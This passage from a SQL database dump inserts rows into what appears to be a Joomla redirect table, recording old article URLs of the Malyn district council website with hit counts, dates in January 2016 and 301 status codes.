00:00:00',301),(23954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:17:54','0000-00-00 00:00:00',301),(23955,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:17:56','0000-00-00 00:00:00',301),(23956,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:17:59','0000-00-00 00:00:00',301),(23957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:18:04','0000-00-00 00:00:00',301),(23958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:18:06','0000-00-00 00:00:00',301),(23959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=735:2012-07-18-13-32-43&catid=43&Itemid=82&lang=en','','','',1,0,'2016-01-03 12:18:08','0000-00-00 00:00:00',301),(23960,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=735:2012-07-18-13-32-43&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2016-01-03 12:18:12','0000-00-00 00:00:00',301),(23961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:18:20','0000-00-00 00:00:00',301),(23962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:18:22','0000-00-00 00:00:00',301),(23963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=739:2012-07-23-12-44-57&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:18:25','0000-00-00 00:00:00',301),(23964,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:18:28','0000-00-00 00:00:00',301),(23965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=uk','','','',1,0,'2016-01-03 12:18:32','0000-00-00 00:00:00',301),(23966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:18:35','0000-00-00 00:00:00',301),(23967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:18:50','0000-00-00 00:00:00',301),(23968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:18:53','0000-00-00 00:00:00',301),(23969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:18:55','0000-00-00 00:00:00',301),(23970,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:18:57','0000-00-00 00:00:00',301),(23971,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=uk','','','',1,0,'2016-01-03 12:18:59','0000-00-00 00:00:00',301),(23972,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:19:03','0000-00-00 00:00:00',301),(23973,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:19:06','0000-00-00 00:00:00',301),(23974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:19:25','0000-00-00 00:00:00',301),(23975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:19:28','0000-00-00 00:00:00',301),(23976,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:19:30','0000-00-00 00:00:00',301),(23977,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:19:33','0000-00-00 00:00:00',301),(23978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:19:36','0000-00-00 00:00:00',301),(23979,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:19:38','0000-00-00 00:00:00',301),(23980,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:19:41','0000-00-00 00:00:00',301),(23981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:19:43','0000-00-00 00:00:00',301),(23982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:19:45','0000-00-00 00:00:00',301),(23983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:19:48','0000-00-00 00:00:00',301),(23984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 12:19:51','0000-00-00 00:00:00',301),(23985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=749:2012-08-24-05-59-17&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:19:54','0000-00-00 00:00:00',301),(23986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:20:11','0000-00-00 00:00:00',301),(23987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:20:13','0000-00-00 00:00:00',301),(23988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:20:16','0000-00-00 00:00:00',301),(23989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11&lang=uk','','','',1,0,'2016-01-03 12:20:19','0000-00-00 00:00:00',301),(23990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:20:21','0000-00-00 00:00:00',301),(23991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:20:23','0000-00-00 00:00:00',301),(23992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:20:28','0000-00-00 00:00:00',301),(23993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:20:30','0000-00-00 00:00:00',301),(23994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:20:33','0000-00-00 00:00:00',301),(23995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=uk','','','',1,0,'2016-01-03 12:20:35','0000-00-00 00:00:00',301),(23996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:20:37','0000-00-00 00:00:00',301),(23997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:20:55','0000-00-00 00:00:00',301),(23998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:20:57','0000-00-00 00:00:00',301),(23999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:20:59','0000-00-00 00:00:00',301),(24000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=uk','','','',1,0,'2016-01-03 12:21:01','0000-00-00 00:00:00',301),(24001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:21:04','0000-00-00 00:00:00',301),(24002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 12:21:07','0000-00-00 00:00:00',301),(24003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 12:21:09','0000-00-00 00:00:00',301),(24004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 12:21:12','0000-00-00 00:00:00',301),(24005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 12:21:14','0000-00-00 00:00:00',301),(24006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 12:21:17','0000-00-00 00:00:00',301),(24007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=uk','','','',1,0,'2016-01-03 12:21:19','0000-00-00 00:00:00',301),(24008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:-2012-2015-&catid=45&Itemid=84&lang=en','','','',1,0,'2016-01-03 12:21:22','0000-00-00 00:00:00',301),(24009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=770:-2012-2015-&catid=45&Itemid=84&lang=ru','','','',1,0,'2016-01-03 12:21:24','0000-00-00 00:00:00',301),(24010,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu','','','',14,0,'2016-01-03 13:58:18','0000-00-00 00:00:00',301),(24011,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45:--14112012-&Itemid=84&lang=en','','','',1,0,'2016-01-03 14:31:25','0000-00-00 00:00:00',301),(24012,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:31:30','0000-00-00 00:00:00',301),(24013,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2016-01-03 14:31:35','0000-00-00 00:00:00',301),(24014,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:32:22','0000-00-00 00:00:00',301),(24015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=775:2012-10-02-09-35-53&catid=45&Itemid=84&lang=en','','','',1,0,'2016-01-03 14:32:33','0000-00-00 00:00:00',301),(24016,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=775:2012-10-02-09-35-53&catid=45&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:32:43','0000-00-00 00:00:00',301),(24017,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=775:2012-10-02-09-35-53&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2016-01-03 14:33:10','0000-00-00 00:00:00',301),(24018,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 14:33:27','0000-00-00 00:00:00',301),(24019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 14:33:38','0000-00-00 00:00:00',301),(24020,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=uk','','','',1,0,'2016-01-03 14:33:46','0000-00-00 00:00:00',301),(24021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 14:33:54','0000-00-00 00:00:00',301),(24022,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=786:-5-18112009-429-l-r&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:33:58','0000-00-00 00:00:00',301),(24023,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=793:2012-10-17-06-29-27&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2016-01-03 14:34:27','0000-00-00 00:00:00',301),(24024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 14:35:04','0000-00-00 00:00:00',301),(24025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 14:35:09','0000-00-00 00:00:00',301),(24026,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 14:35:14','0000-00-00 00:00:00',301),(24027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 14:35:24','0000-00-00 00:00:00',301),(24028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 14:35:42','0000-00-00 00:00:00',301),(24029,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 14:35:48','0000-00-00 00:00:00',301),(24030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 14:35:58','0000-00-00 00:00:00',301),(24031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=uk','','','',1,0,'2016-01-03 14:36:01','0000-00-00 00:00:00',301),(24032,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=804:2012-10-28-18-37-40&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 14:36:07','0000-00-00 00:00:00',301),(24033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=en','','','',1,0,'2016-01-03 14:36:12','0000-00-00 00:00:00',301),(24034,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 14:36:18','0000-00-00 00:00:00',301),(24035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 14:36:25','0000-00-00 00:00:00',301),(24036,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=ru','','','',1,0,'2016-01-03 14:36:33','0000-00-00 00:00:00',301),(24037,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 14:36:37','0000-00-00 00:00:00',301),(24038,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 14:36:44','0000-00-00 00:00:00',301),(24039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 14:36:56','0000-00-00 00:00:00',301),(24040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 14:37:02','0000-00-00 00:00:00',301),(24041,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 14:37:12','0000-00-00 00:00:00',301),(24042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=ru','','','',1,0,'2016-01-03 14:37:16','0000-00-00 00:00:00',301),(24043,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 14:37:24','0000-00-00 00:00:00',301),(24044,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 14:37:35','0000-00-00 00:00:00',301),(24045,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=uk','','','',1,0,'2016-01-03 14:37:43','0000-00-00 00:00:00',301),(24046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 14:37:50','0000-00-00 00:00:00',301),(24047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 14:37:52','0000-00-00 00:00:00',301),(24048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=en','','','',1,0,'2016-01-03 14:38:34','0000-00-00 00:00:00',301),(24049,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 14:38:40','0000-00-00 00:00:00',301),(24050,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 14:38:45','0000-00-00 00:00:00',301),(24051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 14:38:52','0000-00-00 00:00:00',301),(24052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2016-01-03 14:38:56','0000-00-00 00:00:00',301),(24053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=uk&Itemid=0','','','',1,0,'2016-01-03 14:39:02','0000-00-00 00:00:00',301),(24054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45&Itemid=84&lang=en','','','',1,0,'2016-01-03 14:39:06','0000-00-00 00:00:00',301),(24055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:39:12','0000-00-00 00:00:00',301),(24056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45:--14112012-&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:39:48','0000-00-00 00:00:00',301),(24057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2016-01-03 14:39:53','0000-00-00 00:00:00',301),(24058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45&Itemid=84&lang=ru','','','',1,0,'2016-01-03 14:40:01','0000-00-00 00:00:00',301),(24059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 14:40:29','0000-00-00 00:00:00',301),(24060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 14:40:32','0000-00-00 00:00:00',301),(24061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 14:40:48','0000-00-00 00:00:00',301),(24062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=en&Itemid=','','','',1,0,'2016-01-03 14:40:52','0000-00-00 00:00:00',301),(24063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=ru&Itemid=','','','',1,0,'2016-01-03 14:40:58','0000-00-00 00:00:00',301),(24064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=uk&Itemid=','','','',1,0,'2016-01-03 14:41:09','0000-00-00 00:00:00',301),(24065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=en&Itemid=0','','','',1,0,'2016-01-03 14:42:11','0000-00-00 00:00:00',301),(24066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=uk','','','',2,0,'2016-01-03 14:42:18','0000-00-00 00:00:00',301),(24067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=uk','','','',1,0,'2016-01-03 14:42:27','0000-00-00 00:00:00',301),(24068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:------qq&catid=15&lang=uk','','','',1,0,'2016-01-03 14:42:51','0000-00-00 00:00:00',301),(24069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:------qq&catid=15&lang=uk','','','',1,0,'2016-01-03 14:42:55','0000-00-00 00:00:00',301),(24070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=uk','','','',1,0,'2016-01-03 14:43:05','0000-00-00 00:00:00',301),(24071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=uk','','','',1,0,'2016-01-03 14:43:16','0000-00-00 00:00:00',301),(24072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=uk','','','',1,0,'2016-01-03 14:43:37','0000-00-00 00:00:00',301),(24073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=uk','','','',2,0,'2016-01-03 14:43:51','0000-00-00 00:00:00',301),(24074,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1268-pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji','','','',1,0,'2016-01-03 16:58:51','0000-00-00 00:00:00',301),(24075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=690:2012-05-29-18-50-09&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-01-03 18:06:59','0000-00-00 00:00:00',301),(24076,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=786:-5-18112009-429-l-r&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 18:40:45','0000-00-00 00:00:00',301),(24077,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=675:2012-05-17-09-49-52&Itemid=80&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:45:52','0000-00-00 00:00:00',301),(24078,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=701:-2011-2017-&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:45:53','0000-00-00 00:00:00',301),(24079,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=928:2013-02-21-09-10-17&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:45:54','0000-00-00 00:00:00',301),(24081,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=775:2012-10-02-09-35-53&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:46:58','0000-00-00 00:00:00',301),(24082,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=969:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2016-01-03 18:46:59','0000-00-00 00:00:00',301),(24083,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-03 18:47:53','0000-00-00 00:00:00',301),(24084,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=985:2013-04-12-09-53-08&Itemid=88&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:49:08','0000-00-00 00:00:00',301),(24085,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=965:2013-03-14-10-56-03&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:49:12','0000-00-00 00:00:00',301),(24086,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=721:-lr&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:49:19','0000-00-00 00:00:00',301),(24087,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=850:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:49:20','0000-00-00 00:00:00',301),(24088,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=777:2012-10-02-10-06-36&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:50:48','0000-00-00 00:00:00',301),(24089,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1022:-lr-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-03 18:51:15','0000-00-00 00:00:00',301),(24090,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=850:-2013-&Itemid=85&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 18:53:38','0000-00-00 00:00:00',301),(24091,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1084:-qq&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:53:43','0000-00-00 00:00:00',301),(24092,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 18:53:44','0000-00-00 00:00:00',301),(24093,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=688:2012-05-25-16-34-51&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:53:45','0000-00-00 00:00:00',301),(24094,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-03 18:53:46','0000-00-00 00:00:00',301),(24095,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1212:2014-02-07-07-01-38&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:56:35','0000-00-00 00:00:00',301),(24096,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-03 18:56:36','0000-00-00 